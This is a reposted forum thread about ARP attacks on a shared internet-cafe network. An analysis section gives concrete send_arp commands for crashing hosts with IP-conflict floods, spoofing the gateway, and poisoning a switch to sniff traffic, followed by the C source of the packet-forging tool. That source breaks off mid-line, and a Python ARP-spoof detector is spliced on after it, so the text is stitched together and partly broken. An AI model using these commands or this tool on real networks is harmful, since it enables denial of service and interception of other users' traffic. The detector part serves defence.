Defend against LAN attacks (ZT: repost)

Source: Internet
Author: User

A friend of mine recently suffered a strange attack at his Internet cafe. It has 60 machines and shares one network segment with six other Internet cafes; the IP addresses range from 192.168.0.1 to 192.168.0.255, and the cafes share CS servers, web servers and streaming media servers. One CS server and one streaming media server are located in another Internet cafe.
Recently, at night and at noon, when the Internet cafe was full, someone attacked the cafe's IP segment. IP address conflicts occurred across a large area, causing the servers to temporarily stop responding on the network, and the CS server and streaming media server on the network stopped responding immediately. Generally it lasted for more than half an hour, with an IP conflict about every 10 seconds. This went on for several days in a row and caused him great losses.


My friend turned to me for help. I first tried to prove that deliberately changing IP addresses could not cause the server to lose its response, so I installed some monitoring software on two machines in his Internet cafe, trying to capture the other party's attack packets and then obtain their MAC address in order to find the attack source. Because the main symptom was IP conflicts, I used CommView 3 to capture all ARP packets. As a result, when the other party attacked at night, I found a large number of regular ARP broadcast packets that were obviously generated by some software. The MAC address was randomly forged, and the IP address was an address from his Internet cafe's range. These packets differed from the normal boot packet: they were pass-through packets, and after a machine received them, a Windows 98 system immediately lost its network response. A Windows 2K system also lost its response after waiting a long time or restarting. The system could only be recovered after confirming the dialog, but by then all connected users had timed out.

Because the MAC address in the packets is forged, I could not find the source, so I searched the Internet for information and confirmed that this is an ARP denial-of-service attack, but I did not find any effective preventive measures, and Microsoft has no corresponding patches. The only way is to use hardware to store the ARP list, unless you use a router to block ARP on the network, but a router is not a device that a small Internet cafe can take on. Of course, if you divide the network into segments, you can also use the gateway to separate them from everyone else, because ARP is only transmitted within one network segment, but then the others cannot share their servers, and in addition the attacker can go to their Internet cafes and continue the damage.

I tried a variety of firewall software and proved that I could not stop such attack packets. No firewall product can shield illegal ARP packets. Using Skynet 2.5 and the Kingsoft network firewall did not block the attack, even with the option of disconnecting the network.

I later found a file called "..." on the Internet. (To prevent someone with ulterior motives from doing bad things, I have left out the name of the software; this is also my own note.) The software can achieve this effect, which proves that such attack software exists on the Internet. You can search for and download it from Google.

The only thing I can tell him now is to unplug the network cable when an attack occurs. Guys, is there really no cheap and convenient way to solve this problem? My friend is in a hurry; if this goes on, his Internet cafe will not be able to continue.

Please help !! Thanks :)

Analysis:
There is already a lot of information about ARP on the Internet, so I do not need to go over all of it.
In the words of a certain expert, "we can do a lot of things; the only thing that limits us is our creativity and imagination."

The same is true for ARP.

The machines discussed below are:
Attacked host (target): 10.5.4.178
Hardware address: 52:54:4C:98:EE:2F
My machine: 10.5.3.69
Hardware address: 52:54:4C:98:ED:C5
Gateway: 10.5.0.3
Hardware address: 00:90:26:3D:0C:F3
Host on another port of the switch: 10.5.3.3
Hardware address: 52:54:4C:98:ED:F7

I. Using ARP to break out of the Windows screen saver
Principle: the IP conflict notice has a higher priority than the screen saver, so when a conflict occurs the machine jumps out of the screen saver.
Key: the number of ARP packets must be appropriate.
[root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 10.5.4.178 52:54:4C:98:EE:2F 40

II. IP conflict and crash caused by ARP
Principle: Windows 9x and NT4 cannot handle IP conflicts, which results in a crash.
Note: for Windows 2K and Linux this only amounts to flooding, which is still effective in most cases; on Linux the system is obviously slowed down.
[root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 10.5.4.178 52:54:4C:98:EE:2F 999999999

III. Using ARP to spoof the gateway, so that a machine on the LAN can no longer get out through the gateway
Principle: use an ARP reply packet to overwrite the corresponding entry in the target host's ARP cache, making it unusable.
[root@sztcww tools]# ./send_arp 10.5.4.178 52:54:4C:98:EE:22 10.5.4.178 00:90:26:3D:0C:F3 1
Note: the preceding command only works for a few seconds, after which the cache will be refreshed correctly by the attacked host, so as long...

IV. Using ARP to spoof the switch and listen to a host on another port of the switch
Modify send_arp.c to construct the following packet:
ethhdr
  src_hw: 52:54:4C:98:ED:F7 ---> dst_hw: FF:FF:FF:FF:FF:FF (broadcast)  proto: 0x806
arphdr
  hw_type: 1  proto: 0x800  hw_size: 6  pro_size: 4  op: 1
  s_ha: 52:54:4C:98:ED:F7  s_ip: 10.5.3.3
  d_ha: 00:00:00:00:00:00  d_ip: 10.5.3.3
Then sniff.
Principle:
A switch has a MAC address learning function: it maintains a table mapping MAC addresses to port numbers, so you can first do the ARP spoofing and then listen.
However, it must be pointed out that after spoofing, the same MAC address will have two port numbers.
"This is actually a matter of competition," yuange said.
It seems that ARP will affect the entire network in the future, but I am not sure.
Since it is a competition, listening can only catch part of the traffic, as on a shared hub, and it may affect the host being listened to because some data is lost.

Of course, there are other uses that require the cooperation of other techniques.
The following is the source of send_arp.c.

/*
This program sends out one ARP packet with source/target IP
and Ethernet hardware addresses supplied by the user. It
compiles and works on Linux and will probably work on any
Unix that has SOCK_PACKET. volobuev@t1.chem.umn.edu
*/
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>     /* exit, atoi */
#include <ctype.h>      /* tolower, isdigit */
#include <errno.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <signal.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <string.h>
#include <strings.h>    /* bzero, bcopy */
#include <arpa/inet.h>
#include <netinet/ip_icmp.h>
#include <linux/if_ether.h>

#define ETH_HW_ADDR_LEN 6
#define IP_ADDR_LEN 4
#define ARP_FRAME_TYPE 0x0806
#define ETHER_HW_TYPE 1
#define IP_PROTO_TYPE 0x0800
#define OP_ARP_REQUEST 2
#define OP_ARP_QUEST 1
#define DEFAULT_DEVICE "eth0"

char usage[] = {"send_arp: sends out custom ARP packet. yuri volobuev\n"
                "usage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr number\n"};

/* Ethernet header followed by the ARP body, laid out exactly as sent on the wire */
struct arp_packet
{
    u_char  targ_hw_addr[ETH_HW_ADDR_LEN];
    u_char  src_hw_addr[ETH_HW_ADDR_LEN];
    u_short frame_type;
    u_short hw_type;
    u_short prot_type;
    u_char  hw_addr_size;
    u_char  prot_addr_size;
    u_short op;
    u_char  sndr_hw_addr[ETH_HW_ADDR_LEN];
    u_char  sndr_ip_addr[IP_ADDR_LEN];
    u_char  rcpt_hw_addr[ETH_HW_ADDR_LEN];
    u_char  rcpt_ip_addr[IP_ADDR_LEN];
    u_char  padding[18];
};

void die(char *);
void get_ip_addr(struct in_addr *, char *);
void get_hw_addr(char *, char *);

int main(int argc, char *argv[])
{
    struct in_addr src_in_addr, targ_in_addr;
    struct arp_packet pkt;
    struct sockaddr sa;
    int sock;
    int j, number;

    if (argc != 6)
        die(usage);
    /* SOCK_PACKET is the old Linux link-layer raw socket type */
    sock = socket(AF_INET, SOCK_PACKET, htons(ETH_P_RARP));
    if (sock < 0)
    {
        perror("socket");
        exit(1);
    }
    number = atoi(argv[5]);
    pkt.frame_type = htons(ARP_FRAME_TYPE);
    pkt.hw_type = htons(ETHER_HW_TYPE);
    pkt.prot_type = htons(IP_PROTO_TYPE);
    pkt.hw_addr_size = ETH_HW_ADDR_LEN;
    pkt.prot_addr_size = IP_ADDR_LEN;
    pkt.op = htons(OP_ARP_QUEST);
    get_hw_addr(pkt.targ_hw_addr, argv[4]);
    get_hw_addr(pkt.rcpt_hw_addr, argv[4]);
    get_hw_addr(pkt.src_hw_addr, argv[2]);
    get_hw_addr(pkt.sndr_hw_addr, argv[2]);
    get_ip_addr(&src_in_addr, argv[1]);
    get_ip_addr(&targ_in_addr, argv[3]);
    memcpy(pkt.sndr_ip_addr, &src_in_addr, IP_ADDR_LEN);
    memcpy(pkt.rcpt_ip_addr, &targ_in_addr, IP_ADDR_LEN);
    bzero(pkt.padding, 18);
    strcpy(sa.sa_data, DEFAULT_DEVICE);
    /* the fifth argument is how many copies of the packet to send */
    for (j = 0; j < number; j++)
    {
        if (sendto(sock, &pkt, sizeof(pkt), 0, &sa, sizeof(sa)) < 0)
        {
            perror("sendto");
            exit(1);
        }
    }
    exit(0);
}

void die(char *str)
{
    fprintf(stderr, "%s\n", str);
    exit(1);
}

void get_ip_addr(struct in_addr *in_addr, char *str)
{
    struct hostent *hostp;

    in_addr->s_addr = inet_addr(str);
    if (in_addr->s_addr == -1)
    {
        if ((hostp = gethostbyname(str)))
            bcopy(hostp->h_addr, in_addr, hostp->h_length);
        else
        {
            fprintf(stderr, "send_arp: unknown host %s\n", str);
            exit(1);
        }
    }
}

/* parse a colon-separated hex hardware address, one byte (two hex digits) per iteration */
void get_hw_addr(char *buf, char *str)
{
    int i;
    char c, val;

    for (i = 0; i < ETH_HW_ADDR_LEN; i++)
    {
        if (!(c = tolower(*str++)))
            die("Invalid hardware address");
        if (isdigit(c))
            val = c - '0';
        else if (c >= 'a' && c <= 'f')
            val = c - 'a' + 10;
        else
            die("Invalid hardware address");
        *buf = val << 4;
        if (!(c = tolower(*str++)))
            die("Invalid hardware addres
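A detection-side counterpart to the ARP patterns described in the Analysis above: a gateway IP claimed from a MAC other than the known one (pattern III) and one IP announced from many forged MACs in a burst (the conflict flood of patterns I/II). This is an added example, not code from the thread or from send_arp.c; the static gateway binding, the ArpMonitor class and the frame builder are assumptions, and the frames in demo() are constructed sample input using the addresses listed in the thread.

```python
import struct
from collections import defaultdict
ETH_P_ARP = 0x0806

def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))

def ip_bytes(s):
    return bytes(int(x) for x in s.split("."))

def build_arp(op, sha, spa, tha, tpa, eth_dst="ff:ff:ff:ff:ff:ff"):
    """Constructed sample input only: one Ethernet II frame carrying an ARP message."""
    eth = struct.pack("!6s6sH", mac_bytes(eth_dst), mac_bytes(sha), ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op,
                      mac_bytes(sha), ip_bytes(spa), mac_bytes(tha), ip_bytes(tpa))
    return eth + arp + bytes(18)  # pad to the 60-byte Ethernet minimum

def parse_arp(frame):
    """Return (op, sender_mac, sender_ip) for an Ethernet/IPv4 ARP frame, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    hw, proto, hlen, plen, op, sha, spa = struct.unpack("!HHBBH6s4s", frame[14:32])
    if (hw, proto, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return op, ":".join(f"{b:02x}" for b in sha), ".".join(map(str, spa))

class ArpMonitor:
    """Tracks which MACs claim each IP and flags the two patterns from the thread."""
    def __init__(self, known, flood_threshold=5):
        self.known = {ip: m.lower() for ip, m in known.items()}  # operator-kept table
        self.claims = defaultdict(set)  # ip -> every MAC that has claimed it
        self.threshold = flood_threshold
        self.alerts = []

    def feed(self, frame):
        parsed = parse_arp(frame)
        if parsed is None:
            return
        op, mac, ip = parsed
        if ip in self.known and mac != self.known[ip]:
            self.alerts.append(("gateway-spoof", ip, mac))  # pattern III
        self.claims[ip].add(mac)
        if len(self.claims[ip]) == self.threshold:
            self.alerts.append(("conflict-flood", ip, self.threshold))  # patterns I/II

def demo():
    mon = ArpMonitor({"10.5.0.3": "00:90:26:3D:0C:F3"})  # gateway binding from the thread
    # ARP reply claiming the gateway IP from a MAC that is not the gateway's (constructed)
    mon.feed(build_arp(2, "52:54:4c:98:ee:22", "10.5.0.3", "52:54:4c:98:ed:c5", "10.5.3.69"))
    for i in range(6):  # one IP announced from six forged MACs, like the cafe flood
        mon.feed(build_arp(1, f"00:11:22:33:44:{i:02x}", "10.5.3.69", "00:00:00:00:00:00", "10.5.3.69"))
    return mon.alerts
```

In practice feed() would be called with frames read from a capture on the cafe's uplink port; the threshold and the known table are the two knobs an operator tunes.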
